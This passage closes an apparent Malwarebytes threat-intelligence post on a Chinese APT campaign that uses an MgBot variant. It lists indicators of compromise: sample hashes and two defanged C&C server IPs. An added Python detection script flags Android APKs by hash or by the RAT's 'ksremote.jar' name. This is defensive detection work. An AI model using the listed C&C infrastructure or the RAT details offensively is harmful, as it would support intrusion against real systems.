f41bfc57c2681d94bf102f39d4af022beddafb4d49a49d7d7c1901d14eb698d2

45.77.245[.]0: This IP was used as a Cobalt Strike C&C server.

42.99.116[.]225: C&C server used by the final payload.

Android samples

b5304a0836baf1db8909128028793d12bd418ff78c69dc6f9d014cadede28b77
9aade1f7a1f067688d5da9e9991d3a66799065ffe82fca7bb679a71d89fec846
5f7f87db34340ec83314313ec40333aebe6381ef00b69d032570749d4cedee46
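Added example, not the post's own tooling: a triage function that takes APK bytes, checks the SHA-256 against the Android sample hashes listed above, and looks for a ksremote.jar entry inside the archive (an APK is a zip). The post does not say where in the APK the jar sits, so the check is by file name at any path. The sample APK built in the block is constructed in memory for the example and is not a real sample, which is why it matches on the jar name but not on a hash.

```python
import hashlib
import io
import zipfile

# SHA-256 hashes of the Android samples listed in this post.
ANDROID_IOC_HASHES = {
    "b5304a0836baf1db8909128028793d12bd418ff78c69dc6f9d014cadede28b77",
    "9aade1f7a1f067688d5da9e9991d3a66799065ffe82fca7bb679a71d89fec846",
    "5f7f87db34340ec83314313ec40333aebe6381ef00b69d032570749d4cedee46",
}
RAT_JAR_NAME = "ksremote.jar"


def triage_apk(data):
    """Check APK bytes against the hash list and look for the RAT's jar by name."""
    sha256 = hashlib.sha256(data).hexdigest()
    result = {
        "sha256": sha256,
        "hash_match": sha256 in ANDROID_IOC_HASHES,
        "valid_zip": False,
        "jar_paths": [],
    }
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            result["valid_zip"] = True
            # Match on the final path component so a jar under assets/, lib/
            # or any other directory is caught; the post gives no location.
            result["jar_paths"] = [
                name for name in zf.namelist()
                if name.rsplit("/", 1)[-1].lower() == RAT_JAR_NAME
            ]
    except zipfile.BadZipFile:
        # Not a zip at all (truncated download, wrong file); report and move on.
        pass
    result["suspicious"] = result["hash_match"] or bool(result["jar_paths"])
    return result


def build_sample_apk(include_jar):
    """Construct a minimal APK-shaped zip in memory; not a real application."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("AndroidManifest.xml", "<manifest/>")
        zf.writestr("classes.dex", b"dex\n035\0" + b"\0" * 16)
        if include_jar:
            # Empty-zip bytes standing in for the jar; only the name matters here.
            zf.writestr("assets/" + RAT_JAR_NAME, b"PK\x05\x06" + b"\0" * 18)
    return buf.getvalue()


if __name__ == "__main__":
    for label, blob in (("with jar", build_sample_apk(True)),
                        ("clean", build_sample_apk(False)),
                        ("garbage", b"not a zip")):
        r = triage_apk(blob)
        print(f"{label}: suspicious={r['suspicious']} jar={r['jar_paths']} "
              f"zip={r['valid_zip']} sha256={r['sha256'][:16]}...")
```

Hash matching only catches the three exact samples; the name check is the more durable of the two, since the post says all the bogus applications carry the same jar, and it survives trivial repacking that changes the APK hash.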

The post Chinese APT group targets India and Hong Kong using new variant of MgBot malware appeared first on Malwarebytes Labs.